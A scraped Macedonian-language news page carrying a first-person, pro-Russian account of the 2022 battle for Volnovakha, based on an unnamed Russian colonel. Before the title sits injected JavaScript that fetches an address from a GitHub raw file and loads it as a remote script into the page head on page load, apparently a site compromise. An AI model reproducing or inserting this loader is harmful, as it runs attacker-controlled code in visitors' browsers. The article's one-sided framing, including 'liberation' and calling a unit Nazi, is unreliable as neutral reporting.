;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Ексклузивно од ДНР - Битката за Волноваха - Антропол
АктуелноИнтернационално

Ексклузивно од ДНР – Битката за Волноваха

  • Од Волноваха пишува: Дарко Тодоровски – Магистер по меѓународни односи и воен аналитичар.

Секоја војна сама по себе е трагедија. Во тоа јас со свои очи се уверив во Украина, поточно во областа Донбас, каде што од 2014 година се води граѓанска војна, која што на 24-ти февруари прерасна во војна помеѓу Русија и Украина.

За време на престојот во Волноваха имав чест да поразговарам со полковник на армијата на Руската Федерација. После разговорот со полковникот на 58-та армија на Руската Федерација (од безбедносни причини неговото име нема да биде објавено), кој што е одговорен за воената операција на правецот Доњецк – Волноваха, кратка реконструкција на битката за Волноваха.

Полковникот ги пофали неговите војници и офицери дека ги исполниле поставените задачи, и исто им оддаде признание на украинските војници за достојниот отпор кој што го пружиле.

Со исклучок на Мариупол, Волноваха е градот каде што досега се водени најжестоките борби на територијата на Украина, поточно на Донбас. Волноваха е првата голема воена победа за руската и за доњецката армија од почетокот на војната помеѓу Русија и Украина на 24-ти февруари. Битката за Волноваха се траела од 27-ми февруари до 11-ти март, и истата завршила со победа за доњецката и руската армија.

Волноваха е град кој што е оддалечен 57 километри од Доњецк, и град кој што има стратешка важност, бидејќи во градот се наоѓа стратешки железнички јазол, огромен железнички центар, складови и депоа, и низ Волноваха минува главната железничка пруга за Мариупол и за Доњецк. Плус низ Волноваха минува автопатот Славјанск – Доњецк – Мариупол.

Волноваха има и стратешка важност од воена гледна точка. Со ставањето на Волноваха под контрола, руската и доњецката армија можат да напредуваат на север, и од крилата да ја опкружуваат главнината на украинската армија која што е стационирана во конгломератот Славјанск – Краматорск. Исто се отвора можност за слободно движење на единиците на југ, во правец на Мариупол. Со ставањето во повторна функција на железницата, значајно ќе биде олеснета логистиката на руската армија, како и нејзината мобилност.

Според пописот од 2021 година, во Волноваха живееле околу 21 000 граѓани. Но добар дел од населението по почетокот на војната се евакуирало и на територијата на Русија, но и во внатрешноста на Украина.

Стратешкото значење на Волноваха го видов со свои очи, кога за време на нашето присуство таму од неколку различни правци низ Волноваха поминаа огромни воени колони на 58-та армија, како и на доњецката армија, поточно моторизирани единици, кои што се упатија на север на Доњецката област, во правец на Славјански, и на југ кон Мариупол . Во колоните можеа да се забележат тенковите Т-72Б и Т-72Б3, борбените оклопни возила БМП-3 и БМП-2, батерија на артилериските хаубици МСТА-М, командни возила, разните видови оклопни камиони Камаз и Урал, како и целата пропратна логистика за тие единици и техника. Од Волноваха се транспортираа и неколку оштетени тенкови Т-72Б на ремонт во Доњецк.

Во битката за Волноваха главниот товар на себе го зеле единиците на армијата на доњецката Народна Република, а учествувале и единиците на Јужниот воен округ на Русија, поточно 58-та армија на Руската Федерација, пред се давајќи артилериска, разузнавачка и воздушна поддршка на единиците на доњецката армија.

Од страна на Украина, во битката учество зеле единици на украинската армија, како и припадници на нацистичкиот баталјон Азов. Доњецката и руската армија напредувајќи од две страни од страната на Доњецк без проблем ги уништиле првите одбранбени линии, огнени точки и утврдување на украинската армија во полињата и во околината на Волноваха.

Вторите линии на одбраната на украинската армија се наоѓале во самата Волноваха, во зградите, домовите, како и во главната болница, која што се наоѓа на стратешка локација. Во нив украинската армија создала огнени точки, се со цел долготрајна одбрана. Тенковите и другата воена техника на украинската армија била разместени и криени околу зградите и домовите, се со цел истата да се заштити од дејството на артилеријата и авијацијата на руската армија. Одбранбена линија се наоѓала и во домовите на почетокот на Волноваха.

По првиот огнен контакт со украинската армија напредувањето на руската и доњецката армија било запрено, по што Волноваха била опкружена и блокирана, и се пристапило кон чистење на градот, проследено со жестоки улични борби. Од страна на доњецката и руската армија главниот товар во уличните борби паднал на баталјонот за специјални операции „Спарта”, како и специјални единиците на руската армија составени од Чеченци.

За да ги минимизираат загубите во војници и воена техника, доњецката и руската армија пристапиле кон користење на целата огнена моќ, пред се на артилеријата, поточно реактивната артилерија и авијацијата. Користена е и нова техника за урбани борби и борби во градски средини. Јуришни групи од 8 војници и специјалци биле покривани и штитени од еден тенк или борбено оклопно возило додека напредувале по улиците на Волноваха, и ги чистеле домовите и зградите систематски по ред од украинските војници кои што се бранеле.

Тенковите и борбените возила покрај заштитата, на јуришните групи им пружале и огнена поддршка, и ги уништувале огнените точки на украинската армија во зградите и домовите. Беспилотни летала постојано летале над Волноваха. При секој посериозен отпор од страна на украинските војници и посебно на припадниците на Азов, на помош била повикувана артилеријата и авијацијата, која што била координирана со помош на беспилотни летала. Артилеријата и авијацијата го чистеле патот за ударните групи.

Оваа тактика била користена за секоја улица, зграда или куќа. Како резултат на огромната предност во огнена моќ, пред се артилерија, авијација и тенкови, како и предноста во жива сила, доњецката и руската армија брзо успеале да го скршат отпорот на украинската армија и да ја ослободат Волноваха.

Во битката за Волноваха загинал командантот на баталјонот “Спарта”, Владимир Жога. Официјалните загуби од двете страни не се објавени, како и имињата на единиците од двете страни кои што учествувале во битката за Волноваха.

Имав прилика да го видам големиот број на уништена воена техника по улиците и центарот на Волноваха и од двете завојувани страни, уништените домови и згради кои зборуваат за жестокоста на борбите во Волноваха. Жителите на Волноваха кои што не биле евакуирани, се криеле во подземните скривници за време на битката за Волноваха, и со денови биле без храна, вода и греење.

Како резултат на жестоките улични борби, и пред се дејството на руската и на украинската артилерија, 80% од центарот на Волноваха е уништен. Голем дел од домовите и зградите ќе треба да се срушат и поново да бидат изградени во центарот. Но жителите на Волноваха иако без кров на главата и без јасна иднина, се оптимисти и велат дека најважно е да има мир, и дека тие повторно ќе го изградат својот сакан град, без разлика колку време на тоа ќе биде потребно.

Започнато е со чистење на улиците од уништената воена техника, како и од урнатините, и започната е реконструкција на најважните инфраструктурни објекти.